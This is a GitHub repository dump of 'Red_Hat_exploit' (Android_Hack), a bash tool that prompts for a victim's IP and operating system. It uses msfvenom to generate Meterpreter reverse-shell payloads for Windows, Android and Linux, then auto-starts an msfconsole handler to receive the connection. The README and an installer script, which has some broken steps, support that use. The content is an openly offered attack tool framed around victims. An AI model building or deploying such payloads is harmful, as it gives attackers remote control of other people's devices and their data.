├── Android_Hack.sh ├── README.md ├── imge.png ├── imge2.png └── install.sh /Android_Hack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | Black='\033[1;30m' # Black 3 | Red='\033[1;31m' # Red 4 | Green='\033[1;32m' # Green 5 | Yellow='\033[1;33m' # Yellow 6 | Blue='\033[1;34m' # Blue 7 | Purple='\033[1;35m' # Purple 8 | Cyan='\033[1;36m' # Cyan 9 | White='\033[1;37m' # White 10 | NC='\033[0m' 11 | blue='\033[0;34m' 12 | white='\033[0;37m' 13 | lred='\033[0;31m' 14 | 15 | root=$( id -u ) 16 | folder='~/Desktop/payloads' 17 | 18 | 19 | 20 | logo () { 21 | echo -e "\033[1;31m \t 22 | \t╭━━━╮╱╱╱╱╭╮╭╮╱╭╮╱╱╭╮╱╭━━╮ 23 | \t ┃╭━╮┃╱╱╱╱┃┃┃┃╱┃┃╱╭╯╰╮┃╭╮┃ 24 | \t ┃╰━╯┣━━┳━╯┃┃╰━╯┣━┻╮╭╯┃╰╯╰┳━━┳╮╱╭┳━━╮ 25 | \t ┃╭╮╭┫╭╮┃╭╮┃┃╭━╮┃╭╮┃┃╱┃╭━╮┃╭╮┃┃╱┃┃━━┫ 26 | \t┃┃┃╰┫╭╮┃╰╯┃┃┃╱┃┃╭╮┃╰╮┃╰━╯┃╰╯┃╰━╯┣━━┃ 27 | \t╰╯╰━┻╯╰┻━━╯╰╯╱╰┻╯╰┻━╯╰━━━┻━━┻━╮╭┻━━╯ 28 | \t╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╭━╯┃ 29 | \t ╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╰━━╯ 30 | 31 | "; 32 | echo -e "\033[1;32m" Android_hacking v1.0 33 | echo -e "\033[1;32m" Coded by Musharaff 34 | echo -e "\033[1;32m" Donet paypal : mjykings12@gmail.com 35 | echo -e "\033[1;32m" Bitcoin : 1BMvK1jmYwvQn6VLfkZsTSThEiVXe7tQdU 36 | 37 | 38 | } 39 | 40 | target () { 41 | echo -ne "\n${Blue}[#] Enter IP of the victim's machine: ${White}"; read ip 42 | echo -ne "${Blue}[#] Enter a Port no.: ${White}"; read port 43 | echo -ne "${Blue}[#] Enter the FILE name: ${White}"; read file 44 | } 45 | 46 | windows () { 47 | clear 48 | logo 49 | echo -e "\n" 50 | sleep 0.3 51 | echo -e "${Blue}+-------------------------------------------------------+" 52 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Windows${Yellow}] ${Blue} +" 53 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 54 | sleep 0.3 55 | echo -ne "${Blue}+ " 56 | echo -e "${White}[1] ${Purple}windows/meterpreter/reverse_tcp ${Blue} +" 57 | echo -e "+ ${White}[2] ${Purple}windows/meterpreter/reverse_http ${Blue} +" 58 | echo -e "+ ${White}[3] ${Purple}windows/meterpreter/reverse_tcp_dns ${Blue} +" 59 | echo -e "+ ${White}[4] ${Purple}windows/meterpreter/reverse_https ${Blue} +" 60 | echo -e "+ ${White}[5] ${Purple}windows/meterpreter/reverse_tcp_uuid ${Blue} +" 61 | echo -e "+ ${White}[6] ${Purple}windows/meterpreter/reverse_winhttp ${Blue} +" 62 | echo -e "+ ${White}[7] ${Purple}windows/meterpreter/reverse_winhttps ${Blue} +" 63 | echo -e "${Blue}+-------------------------------------------------------+" 64 | sleep 0.3 65 | echo -ne "${Green}[#] Choose a payload: ${White}" 66 | read payloadWindow 67 | 68 | case $payloadWindow in 69 | 70 | 1) 71 | target 72 | echo 73 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 74 | echo 75 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 76 | payload='windows/meterpreter/reverse_tcp' ;; 77 | 78 | 2) 79 | target 80 | echo 81 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 82 | echo 83 | msfvenom -p windows/meterpreter/reverse_http LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 84 | payload='windows/meterpreter/reverse_http' ;; 85 | 86 | 3) 87 | target 88 | echo 89 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 90 | echo 91 | msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 92 | payload='windows/meterpreter/reverse_tcp_dns' ;; 93 | 94 | 4) 95 | target 96 | echo 97 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 98 | echo 99 | msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 100 | payload='windows/meterpreter/reverse_https' ;; 101 | 102 | 5) 103 | target 104 | echo 105 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 106 | echo 107 | msfvenom -p windows/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 108 | payload='windows/meterpreter/reverse_tcp_uuid' ;; 109 | 110 | 6) 111 | target 112 | echo 113 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 114 | echo 115 | msfvenom -p windows/meterpreter/reverse_winhttp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 116 | payload='windows/meterpreter/reverse_winhttp' ;; 117 | 118 | 7) 119 | target 120 | echo 121 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 122 | echo 123 | msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null 124 | payload='windows/meterpreter/reverse_winhttps' ;; 125 | 126 | *) 127 | echo -e "${Cyan}[*] INVALID CHOICE!" 128 | sleep 1 129 | exit ;; 130 | 131 | esac 132 | } 133 | 134 | android () { 135 | clear 136 | logo 137 | echo -e "\n" 138 | echo -e "${Blue}+-------------------------------------------------------+" 139 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Android${Yellow}] ${Blue} +" 140 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 141 | sleep 0.3 142 | echo -ne "${Blue}+ " 143 | echo -e "${White}[1] ${Purple}android/meterpreter/reverse_tcp ${Blue} +" 144 | echo -e "+ ${White}[2] ${Purple}android/meterpreter/reverse_https ${Blue} +" 145 | echo -e "+ ${White}[3] ${Purple}android/meterpreter/reverse_http ${Blue} +" 146 | echo -e "${Blue}+-------------------------------------------------------+" 147 | sleep 0.3 148 | echo -ne "${Green}[#] Choose a payload: ${White}" 149 | read payloadAndro 150 | 151 | case $payloadAndro in 152 | 153 | 1) 154 | target 155 | echo 156 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 157 | echo 158 | msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 159 | payload='android/meterpreter/reverse_tcp' ;; 160 | 161 | 2) 162 | target 163 | echo 164 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 165 | echo 166 | msfvenom -p android/meterpreter/reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 167 | payload='android/meterpreter/reverse_https' ;; 168 | 169 | 3) 170 | target 171 | echo 172 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 173 | echo 174 | msfvenom -p android/meterpreter/reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 175 | payload='android/meterpreter/reverse_http' ;; 176 | 177 | * ) 178 | echo -e "${Cyan}[*] INVALID CHOICE!" 179 | sleep 1 180 | exit ;; 181 | 182 | esac 183 | } 184 | 185 | linux (){ 186 | clear 187 | logo 188 | echo -e "\n" 189 | echo -e "${Blue}+-------------------------------------------------------+" 190 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Linux${Yellow}] ${Blue} +" 191 | echo -e "${Blue}+-------------------------------------------------------+${NC}" 192 | sleep 0.3 193 | echo -ne "${Blue}+ " 194 | echo -e "${White}[1] ${Purple}linux/x86/meterpreter_reverse_tcp ${Blue} +" 195 | echo -e "+ ${White}[2] ${Purple}linux/x86/meterpreter_reverse_https ${Blue} +" 196 | echo -e "+ ${White}[3] ${Purple}linux/x86/meterpreter_reverse_http ${Blue} +" 197 | echo -e "+ ${White}[4] ${Purple}linux/x86/meterpreter/reverse_tcp_uuid ${Blue} +" 198 | echo -e "+ ${White}[5] ${Purple}linux/x86/meterpreter/reverse_ipv6_tcp ${Blue} +" 199 | echo -e "+ ${White}[6] ${Purple}linux/x86/meterpreter/reverse_nonx_tcp ${Blue} +" 200 | echo -e "${Blue}+-------------------------------------------------------+" 201 | sleep 0.3 202 | echo -ne "${Green}[#] Choose a payload: ${White}" 203 | read payloadlinux 204 | 205 | case $payloadlinux in 206 | 207 | 1) 208 | target 209 | echo 210 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 211 | echo 212 | msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 213 | payload='linux/x86/meterpreter_reverse_tcp' ;; 214 | 215 | 2) 216 | target 217 | echo 218 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 219 | echo 220 | msfvenom -p linux/x86/meterpreter_reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 221 | payload='linux/x86/meterpreter_reverse_https' ;; 222 | 223 | 3) 224 | target 225 | echo 226 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 227 | echo 228 | msfvenom -p linux/x86/meterpreter_reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 229 | payload='linux/x86/meterpreter_reverse_http' ;; 230 | 231 | 4) 232 | target 233 | echo 234 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 235 | echo 236 | msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 237 | payload='linux/x86/meterpreter/reverse_tcp_uuid' ;; 238 | 239 | 5) 240 | target 241 | echo 242 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 243 | echo 244 | msfvenom -p linux/x86/meterpreter/reverse_ipv6_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 245 | payload='linux/x86/meterpreter/reverse_ipv6_tcp' ;; 246 | 247 | 6) 248 | target 249 | echo 250 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n" 251 | echo 252 | msfvenom -p linux/x86/meterpreter/reverse_nonx_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null 253 | payload='linux/x86/meterpreter/reverse_nonx_tcp' ;; 254 | 255 | 256 | * ) 257 | echo -e "${Cyan}[*] INVALID CHOICE!" 258 | sleep 1 259 | exit ;; 260 | 261 | esac 262 | } 263 | 264 | 265 | if [ $root != 0 ] ; then 266 | echo -e "${Purple}[#] Run this Script as 'sudo'! " 267 | sleep 2 268 | exit 269 | fi 270 | 271 | if [ -e $folder ] ; then 272 | cd ~/Desktop/payloads 273 | else 274 | mkdir ~/Desktop/payloads && cd ~/Desktop/payloads 275 | fi 276 | 277 | 278 | clear 279 | logo 280 | sleep 0.3 281 | echo -e "${Yellow}[*] Payloads are available For-\n" 282 | sleep 0.3 283 | echo -e " ${White}[1] ${Blue}Windows" 284 | echo -e " ${White}[2] ${Blue}Android" 285 | echo -e " ${White}[3] ${Blue}Linux\n" 286 | sleep 0.3 287 | echo -ne "${Green}[#] Choose Victim's OS:${White} " 288 | read OS 289 | 290 | case $OS in 291 | 292 | 1) 293 | windows;; 294 | 295 | 2) 296 | android ;; 297 | 298 | 3) 299 | linux ;; 300 | 301 | * ) 302 | echo -e "${Cyan}[*] INVALID OPTION" 303 | sleep 1 304 | echo -e "${Cyan}[*] Exiting..." 305 | sleep 0.2 306 | exit ;; 307 | 308 | esac 309 | 310 | echo -e "${Purple}[*] Payload has been saved in the desktop folder '${Cyan}payloads${Purple}'" 311 | sleep 0.3 312 | echo -ne "${Green}[#] Do you want to automatically configure the handler and let it listen? [${Cyan}y${Green}/${Cyan}n${Green}]: ${White}" 313 | read p 314 | if [ $p = "y" ] 315 | then 316 | clear 317 | echo -e "${Green}[*] OPENING ${Purple}MSFCONSOLE${Green}... " 318 | msfconsole -q -x "use multi/handler; set PAYLOAD $payload ; set LHOST $ip ; set LPORT $port ; exploit " 319 | elif [ $p = "n" ] 320 | then 321 | echo -e "${Cyan}[*] Byee! See you soon." 322 | sleep 0.2 323 | exit 324 | else 325 | echo -e "${Cyan}[*] INVALID OPTION" 326 | sleep 0.2 327 | echo -e "${Cyan}[*] Exiting..." 328 | sleep 0.2 329 | exit 330 | fi 331 | 332 | 333 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red_Hat_exploit 2 | $ Coded by Musharaff 3 | 4 | ![](/imge.png) 5 | ![](/imge2.png) 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | $ Donet paypal : mjykings12@gmail.com 16 | 17 | $ Bitcoin : 1BMvK1jmYwvQn6VLfkZsTSThEiVXe7tQdU 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | # Download and install 26 | 27 | $ git clone https://github.com/Cyber-Musharaff/Red_Hat_exploit.git 28 | 29 | $ cd Red_Hat_exploit 30 | 31 | $ chmod +x * 32 | 33 | $ sudo ./install.sh -i 34 | 35 | $ sudo ./Android_Hack.sh 36 | -------------------------------------------------------------------------------- /imge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BinaryHijacke/Red_Hat_exploit/e233aa9e0a595839a3e71be680a1dd4662f8000c/imge.png -------------------------------------------------------------------------------- /imge2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BinaryHijacke/Red_Hat_exploit/e233aa9e0a595839a3e71be680a1dd4662f8000c/imge2.png -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | Green='\033[0;32m' 3 | white='\033[0;37m' 4 | NC='\033[0m' 5 | clear 6 | printf '\033]2; INSTALLER\a' 7 | echo -e "${Green}[*] Press \e[0;33many key\e[0;32m to install Android_Hack..." 8 | read -n 1 9 | clear 10 | 11 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" 12 | 13 | if [[ "$DIR" != "/root/Android_Hack" ]] 14 | then 15 | echo -e "\033[0;35m[~] I will install it for you..." 16 | sleep 4 17 | if [[ -d /root/Android_Hack ]] 18 | then 19 | rm -r /root/Android_Hack 20 | fi 21 | mkdir /root/Android_Hack 22 | cp -r "$DIR"/* /root/Android_Hack 23 | chmod +x /root/Android_Hack/install.sh 24 | #gnome-terminal -- bash -c "sudo /root/bootmiester/install.sh; exec bash" 25 | fi 26 | echo -e "${Green}[+] Installing Android_Hack..." 27 | sleep 1 28 | echo -e "${Green}[+] Fixing permissions..." 29 | sleep 2 30 | chmod +x /root/Android_Hack/autoxploit.py 31 | clear 32 | echo -e "${Green}[+] Copying Tool to /bin/autoxploit" 33 | cd /root/Android_Hack 34 | cp /root/Android_Hack/autoxploit.py /bin/Android_Hack 35 | clear 36 | 37 | while true 38 | do 39 | clear 40 | echo -e "${Green}[*] Are you \e[0;33mu\e[0;32mpdating or \e[0;33mi\e[0;32mnstalling the script?(\e[0;33mu\e[0;32m/\e[0;33mi\e[0;32m): " 41 | echo -e "${Green}[#] Only use 'i' for the first time." 42 | read UORI 43 | if [[ "$UORI" = "u" ]] 44 | then 45 | clear 46 | echo -e "This feature is currently under construction.." 47 | sleep 3 48 | exit 49 | elif [[ "$UORI" = "i" ]] 50 | then 51 | clear 52 | BASHCHECK=$(cat ~/.bashrc | grep "/bin/Android_Hack") 53 | if [[ "$BASHCHECK" != "" ]] 54 | then 55 | echo -e "I SAID USE i ONLY ONE TIME..........." 56 | sleep 3 57 | break 58 | fi 59 | echo -e "${Green}[#] Adding Android_Hack to PATH so you can access it from anywhere" 60 | sleep 1 61 | export PATH=/bin/Android_Hack:$PATH 62 | sleep 1 63 | echo "export PATH=/bin/Android_Hack:$PATH" >> ~/.bashrc 64 | sleep 1 65 | clear 66 | break 67 | fi 68 | done 69 | sleep 1 70 | echo -e "${Green}[#] Installation is finished. Type 'sudo Android_Hack' to launch the script after we exit." 71 | sleep 0.5 72 | echo -en "${Green}[+] Starting Android_Hack"; sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ; 73 | sudo Android_Hack 74 | 75 | 76 | --------------------------------------------------------------------------------